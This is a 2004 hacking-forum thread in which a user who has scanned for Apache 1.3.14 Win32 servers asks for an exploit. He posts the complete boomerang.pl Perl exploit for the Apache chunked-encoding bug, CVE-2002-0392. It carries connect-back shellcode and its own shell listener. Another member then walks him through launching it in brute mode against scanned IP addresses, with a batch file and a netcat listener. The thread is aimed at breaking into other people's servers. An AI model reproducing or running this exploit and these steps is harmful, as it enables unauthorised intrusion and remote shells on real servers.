Search Apache 1.3.14 Win32 Exploit

G36K

Feb 22 2004, 12:47 PM

I search Apache 1.3.14 Win32 Exploit

G36K

Feb 22 2004, 08:35 PM

This the Expliot that iam search??? :

http://www.k-otik.net/exploits/12.06.m00-apache-w00t.c.php

http://www.k-otik.com/exploits/07.28.apache_modmylo.c.php

???

future

Feb 22 2004, 09:14 PM

do you not see works only on linux and ***bsd,
and linux and bsd targets?

G36K

Feb 22 2004, 09:40 PM

QUOTE (future @ Feb 22 2004, 09:14 PM)

do you not see works only on linux and ***bsd,
and linux and bsd targets?

My Scanz are:

xxx.xxx.xxx.xxx FOUND Apache 1.3.14 Win32!

Nexcess

Feb 22 2004, 09:52 PM

hxxp://www.google.com

it works miracles...

bitwild

Feb 22 2004, 10:58 PM

make sure to use it with '8&hl=xx-hacker'
just makes you feel l33ter ;)

G36K

Feb 23 2004, 12:25 PM

QUOTE (Nexcess @ Feb 22 2004, 09:52 PM)

hxxp://www.google.com

it works miracles...

LOL?? Kick it in your ass - Spammer!!

I search Expliot for Apachechunked (Win32) no asshole comments.

this the Expliot??:

CODE

#!/usr/bin/perl
###############

##[ Header
# Name: boomerang.pl
# Purpose: Proof of concept exploit for Apache Win32 chunked encoding bug
# CVE: CVE-2002-0392
# Author: H D Moore <hdmoore@digitaldefense.net>
# Copyright: Copyright (C) 2003 Digital Defense Inc.
# Distribution: This code may not be redistributed.
# Release Date: January 9, 2003
# Revision: 1.1
# Download: http://www.digitaldefense.net/labs/securitytools.html
##

##[ Notes
#
# This exploit causes the remote process to connect back
# to the attacking system and spawn a shell. The address
# and port are specified via -H and -P. This code will
# only work on Windows 2000 (all SP's) and may fail if
# Apache service has third-party modules installed. If
# the default settings don't work, try running in "brute"
# or "quick" mode. The Apache code that is bundled with
# related Oracle and IBM products may die after the first
# attempt, otherwise brute-forcing is entirely possible. A
# working NT 4.0 exploit exists but will not be made public,
# the memory layout is a bit different and esi is used instead
# of ebx for returning back to the shell code.
#
###

use strict;
use POSIX;
use IO::Socket;
use IO::Select;
use Getopt::Std;

sub Usage {
my ($targets) = @_;

print STDERR "\n boomerang.pl - Apache Win32 Chunked Encoding Exploit\n";
print STDERR "======================================================\n\n";
print STDERR " Usage: $0 <options> -h <target> -p <port> -H <listener ip> -P <listen port> [brute|quick]\n";
print STDERR " Options:\n";
print STDERR " -c Padding Size\n";
print STDERR " -j Jump Address\n";
print STDERR " -t Target Settings\n";
print STDERR " Targets:\n";

foreach (sort(keys(%{$targets})))
{
print STDERR " $_\n";
}

exit(1);
}

# target format: "Server Banner" => [pad1, pad2, pad3]
my %targets =
(
"Apache/1.3.14" => [360],
"Apache/1.3.17" => [360],
"Apache/1.3.19" => [360, 252], # 252 = 1.3.19 + ApacheJServ/1.1
"Apache/1.3.20" => [360],
"Apache/1.3.22" => [352],
"Apache/1.3.23" => [356],
"Apache/1.3.24" => [356, 244], # 244 = 1.3.24 + mod_jserv
);

# 0x1c0f143c = Win9xConHook.dll - Apache 1.3.14+
# 0x77e842f0 = Kernel32.dll - Win2K SP3
# 0x77e97160 = Kernel32.dll - Win2K SP1
# 0x77e827c0 = Kernel32.dll - Win2K SP0

my @jmps = qw{ 0x1c0f143c };

my %args;
getopt('h:p:c:j:t:s:H:P:', \%args);

if (! $args{h} || ! $args{H})
{
Usage(\%targets);
}

my $target_host = $args{h};
my $local_host = $args{H};
my $local_port = $args{P} || 4444;
my $target_port = $args{p} || 80;
my $target_pads = $args{c} || 0;
my $target_jebx = $args{j} || 0;
my $target_targ = $args{t} || 0;
my $target_mode = shift() || "single";
my $target_scsz = $args{s} || 8100;

if ($target_mode !~ /quick|brute|single/)
{
print "[*] Invalid attack mode: $target_mode (quick or brute only)\n";
exit(0);
}

if ($target_mode eq "brute" && ($args{c} || $args{j} || $args{t}))
{
print "[*] Options are ignored using brute force mode.\n";
}

if ($target_targ)
{
if (exists($targets{$target_targ}))
{
print "[*] Using target settings for $target_targ\n";
} else {
print "[*] Error, invalid target value.\n";
exit(0);
}
$target_targ = $targets{$target_targ};
}

my @target_pile = ();
my $target;
my $shellcode;
my $rsocket;
my $request;
my $listen_pid = StartListener($local_port);

$SIG{USR2} = \&GoAway;

while(<DATA>){ $shellcode .= $_ }
$shellcode = eval($shellcode);

if ($target_mode eq "single")
{
my @pads;

if ($target_targ)
{
foreach (@{$target_targ})
{
push @target_pile, [$_, $jmps[0]];
}
} else {

if (! $target_pads)
{
my $header = GetHead($target_host, $target_port);
foreach (keys(%targets))
{
if ($header =~ /$_ /)
{
$target_pads = $targets{$_}->[0];
print "[*] Using padding size of $target_pads for server: $header\n";
}
}

if (! $target_pads)
{
print "[*] Using default padding size of 360 for server: $header\n";
$target_pads = 360;
}
}

if ($target_jebx)
{
push @target_pile, [$target_pads, eval($target_jebx)];
} else {
push @target_pile, [$target_pads, eval($jmps[0])];
}
}
}

if ($target_mode eq "brute")
{
my @pads;
my $pad;
my $jmp;

# add the most common values first
for ($pad = 348; $pad < 368; $pad += 4) { push @pads, $pad }
for ($pad = 200; $pad < 348; $pad += 4) { push @pads, $pad }
for ($pad = 360; $pad < 400; $pad += 4) { push @pads, $pad }

foreach $jmp (@jmps)
{
foreach $pad (@pads)
{
push @target_pile, [$pad, eval($jmp)];
}
}

print "[*] Trying brute force mode with " . scalar(@target_pile) . " possible targets.\n";
}

if ($target_mode eq "quick")
{
my @pads;
my $pad;
my $jmp;

# only do these pad values
for ($pad = 352; $pad < 364; $pad += 4) { push @pads, $pad }

foreach $pad (@pads)
{
foreach $jmp (@jmps)
{
push @target_pile, [$pad, eval($jmp)];
}
}

print "[*] Trying quick brute force mode with " . scalar(@target_pile) . " possible targets.\n";
}

my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($local_host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
substr($shellcode, 335, 4, $a1 . $a2 . $a3 . $a4);

my ($p1, $p2) = split(//, reverse(pack("s", $local_port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
substr($shellcode, 330, 2, $p1 . $p2);

select(STDOUT); $|++;
foreach $target (@target_pile)
{

print "\n";

print "[*] Shellcode size is " . length($shellcode) . " bytes\n";

$request = BuildExploit($target_host, $target_port, $shellcode, $target->[1], $target->[0], $target_scsz);

print "[*] Exploit request is " . length($request) . " bytes\n";

AttemptExploit($target_host, $target_port, $request);
}

kill("USR2", $listen_pid);
exit(0);

sub BuildExploit {
my ($host, $port, $scode, $jmp_ebx, $pad, $scsz) = @_;
my $request;
my $res;
my $srv;

if (! $pad)
{
print "[*] Error, invalid pad size of 0 used\n";
exit(0);
}

printf("[*] Using %d bytes of padding with jmp address 0x%.8x\n", $pad, $jmp_ebx);

$request = "GET / HTTP/1.1\r\n";
$request .= "Host: $target_host:$target_port\r\n";
$request .= "Transfer-Encoding: CHUNKED\r\n";
$request .= "\r\n";
$request .= "DEADBEEF ";

# large nop sled plus shellcode
$request .= ("\x90" x ($scsz - length($scode)));
$request .= $scode . "\r\n";

# these three bytes are for address alignment
$request .= "PAD";

# place the appropriate amount of padding
$request .= ("O" x $pad);

# this is where ebx points, make it jump over the return address
$request .= "XX" . "\xeb\x04\xeb\x04";

# this is the return address, it needs to point to a valid "jmp ebx" instruction
$request .= pack("l", $jmp_ebx);

# a mini nop sled for the short jmp to land in
$request .= ("\x90\x90\x90\x90" x 4);

# add 1300 to esp to hurdle into the nop sled before the shellcode
$request .= "\x81\xc4\x14\x05\x00\x00"; # add esp, 1300
$request .= "\xff\xe4"; # jmp esp

return $request;
}

sub GetHead {
my ($host, $port) = @_;
my $srv;

my $sh = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
Type => SOCK_STREAM
);

if (! $sh)
{
print "[*] Error, could not connect to the remote host: $!\n";
exit(0);
} else {
print $sh "HEAD / HTTP/1.0\r\n\r\n";

while (<$sh>)
{
if (m/Server: (.*)/)
{
$srv = $1;
$srv =~ s/\r|\n//g;
}
}

if (! $srv)
{
print "[*] Error, the server did not reply with a web server banner\n";
}
close ($sh);
return $srv;
}
}

sub AttemptExploit {
my ($host, $port, $request) = @_;
my $s = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
Type => SOCK_STREAM
);

if (! $s)
{
print "[*] Error, could not connect to $host:$port.\n";
exit(0);
}

print "[*] Sending " .length($request) . " bytes to remote host.\n";
print $s $request;

print "[*] Waiting for shell to spawn.\n";
sleep(2);

return(0);
}

sub StartListener {
my ($local_port) = @_;
my $listen_pid = $$;

my $s = IO::Socket::INET->new (
Proto => "tcp",
LocalPort => $local_port,
Type => SOCK_STREAM,
Listen => 3
);

if (! $s)
{
print "[*] Could not start listener: $!\n";
exit(0);
}

print "[*] Listener started on port $local_port\n";

my $exploit_pid = fork();
if ($exploit_pid)
{
my $victim;
$SIG{USR2} = \&GoAway;

while ($victim = $s->accept())
{
kill("USR2", $exploit_pid);
print STDOUT "[*] Starting Shell\n\n";
StartShell($victim);
}
exit(0);
}
return ($listen_pid);
}

sub StartShell {
my ($client) = @_;
my $sel = IO::Select->new();

Unblock(*STDIN);
Unblock(*STDOUT);
Unblock($client);

select($client); $|++;
select(STDIN); $|++;
select(STDOUT); $|++;

$sel->add($client);
$sel->add(*STDIN);

while (fileno($client))
{
my $fd;
my @fds = $sel->can_read(0.2);

foreach $fd (@fds)
{
my @in = <$fd>;

if(! scalar(@in)) { next; }

if (! $fd || ! $client)
{
print "[*] Closing connection.\n";
close($client);
exit(0);
}

if ($fd eq $client)
{
print STDOUT join("", @in);
} else {
print $client join("", @in);
}
}
}
close ($client);
}

sub Unblock {
my $fd = shift;
my $flags;
$flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
}

sub GoAway {
exit(0);
}

# shellcode by hsj => http://hsj.shadowpenguin.org
__DATA__

$shellcode =
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
"\x93\x40\xe2\xfa".
"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1".
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2".
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93".
"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7".
"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0".
"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8".
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93".
"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93".
"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0".
"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87".
"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60".
"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5".
"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90".
"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22".
"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18".
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92".
"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3".
"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93".
"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9".
"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18".
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce".
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6".
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7".
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4".
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca".
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50";

FakoLy

Feb 23 2004, 01:28 PM

G36K you don't need to be so agressive he's right google knows everything

http://www.google.fr/search?hl=fr&ie=UTF-8...he+Google&meta=

or just try
http://www.k-otik.com
http://www.security-focus.com
http://www.security.nnov.ru/
http://www.securiteam.com/
..
and did you search the forum ? I'm sure apachechuncked exploit has already been posted..
Regards,
F4k0LY

Leonnetje

Feb 23 2004, 01:28 PM

Yep, that's the correct code

G36K

Feb 23 2004, 01:30 PM

QUOTE (Leonnetje @ Feb 23 2004, 01:28 PM)

Yep, that's the correct code

I cant complime the code with lcc ;(

Profound

Feb 23 2004, 01:33 PM

omfg, you gotta be kidding me right

its perl dude, no nee to compile

just download perl and you can run the exploit

Leonnetje

Feb 23 2004, 01:38 PM

QUOTE (G36K @ Feb 23 2004, 01:30 PM)

QUOTE (Leonnetje @ Feb 23 2004, 01:28 PM)

Yep, that's the correct code

I cant complime the code with lcc ;(

Indeed, it's Perl and you don't need to compile it...

Make a file called "Hack.bat" and put this inside

CODE

boomerang_win.pl -H [YOUR IP] -P 35 -p 80 -t Apache/2.0.%1 -h %2 brute

If you have a scan-results looking like this:
123.123.123.123 FOUND Apache 1.3.23 Win32!

then 23 is your version. Remember that !

Now all you have to do is run the Hack.bat file like this:

CODE

Hax.bat <version> <IP>

Oh yeah... let NetCat run on port 35

G36K

Feb 23 2004, 01:45 PM

QUOTE (Leonnetje @ Feb 23 2004, 01:38 PM)

QUOTE (G36K @ Feb 23 2004, 01:30 PM)

QUOTE (Leonnetje @ Feb 23 2004, 01:28 PM)

Yep, that's the correct code

I cant complime the code with lcc ;(

Indeed, it's Perl and you don't need to compile it...

Make a file called "Hack.bat" and put this inside

CODE

boomerang_win.pl -H [YOUR IP] -P 35 -p 80 -t Apache/2.0.%1 -h %2 brute

If you have a scan-results looking like this:
123.123.123.123 FOUND Apache 1.3.23 Win32!

then 23 is your version. Remember that !

Now all you have to do is run the Hack.bat file like this:

CODE

Hax.bat <version> <IP>

Oh yeah... let NetCat run on port 35

boomerang_win.pl -H 128.x.xx.93 -P 35 -p 80 -t Apache/1.3.14 -h 128.x.xx.93 brute

ehm.. they open the editor^^ i need perl?

Leonnetje

Feb 23 2004, 04:01 PM

OK, make sure you download Perl and install it...

Then you download the file here

Extract it, put it in a directory together with the Hack.bat you've made and give it a try...

G36K

Feb 23 2004, 07:44 PM

QUOTE (Leonnetje @ Feb 23 2004, 04:01 PM)

OK, make sure you download Perl and install it...

Then you download the file here

Extract it, put it in a directory together with the Hack.bat you've made and give it a try...

Well it the still helpful gives here. But which fuern by custom I would be best left. The Exsample there above is well however badly to understand custom already more exactly.

boomerang_win.pl -H [YOUR IP] -P 35 -p 80 -t Apache/2.0.%1 -h %2 brute

must i edit this: Apache/2.0.%1 ?

ActivePerl: http://downloads.activestate.com/ActivePer...MSWin32-x86.msi ??

Leonnetje

Feb 23 2004, 08:05 PM

Dude, 1 more time from beginning.

Go to that link and download ActivePerl + install it (maybe you need to reboot after install)

http://downloads.activestate.com/ActivePer...MSWin32-x86.msi

Now you create the file Hack.bat by opening Wordpad and paste this line in there

CODE

boomerang_win.pl -H [YOUR IP] -P 35 -p 80 -t Apache/2.0.%1 -h %2 brute

ONLY FILL IN YOUR IP !!!!

Now save the file and name it: Hack.bat

Now you have installed + you made a .bat-file.

Now let NetCat run and listen to port 35 with this command:

CODE

nc.exe -L -vv -p 35

Put the file 'Hack.bat' in the same directory where you stored/downloaded boomerang_win.pl and open a command-windows (Start --> Run --> CMD), go to the directory where all the files are and type the following command:

CODE

Hack.bat <version> <IP>

I've explained the variable for the version before.

bitwild

Feb 23 2004, 08:11 PM

QUOTE

QUOTE (Nexcess @ Feb 22 2004, 09:52 PM)

hxxp://www.google.com

it works miracles...

LOL?? Kick it in your ass - Spammer!!

I search Expliot for Apachechunked (Win32) no asshole comments.

so don't ask (multiple)asshole questions...

G36K

Feb 24 2004, 12:12 PM

QUOTE (Leonnetje @ Feb 23 2004, 08:05 PM)

Dude, 1 more time from beginning.

Go to that link and download ActivePerl + install it (maybe you need to reboot after install)

http://downloads.activestate.com/ActivePer...MSWin32-x86.msi

Now you create the file Hack.bat by opening Wordpad and paste this line in there

CODE

boomerang_win.pl -H [YOUR IP] -P 35 -p 80 -t Apache/2.0.%1 -h %2 brute

ONLY FILL IN YOUR IP !!!!

Now save the file and name it: Hack.bat

Now you have installed + you made a .bat-file.

Now let NetCat run and listen to port 35 with this command:

CODE

nc.exe -L -vv -p 35

Put the file 'Hack.bat' in the same directory where you stored/downloaded boomerang_win.pl and open a command-windows (Start --> Run --> CMD), go to the directory where all the files are and type the following command:

CODE

Hack.bat <version> <IP>

I've explained the variable for the version before.

Amusingly it does not open only the editor with the ausfuerhen and nc.exe exestiert with me @ Win2k times.

\\EDIT:

[*] Options are ignored using brute force mode.
[*] Using target settings for Apache/1.3.24
[*] Start Netcat on port 35

night^man

Feb 24 2004, 12:19 PM

hmm..
it's preaty old i try some today somthing like 100ip's and nothing
all server R patched

Leonnetje

Feb 24 2004, 03:42 PM

Yep, it's older and probably as dead as can be...

G36K, i give up.. i've explained everything you need to do, it should work now, but you'll have to be VERY lucky to get a shell.

DvilleStoner

Feb 26 2004, 09:06 AM

so sad

Nexcess

Feb 26 2004, 09:14 AM

I didnt bother to reply up till this point as, i figured he'd be deleted by now.
Can we be rid of him please?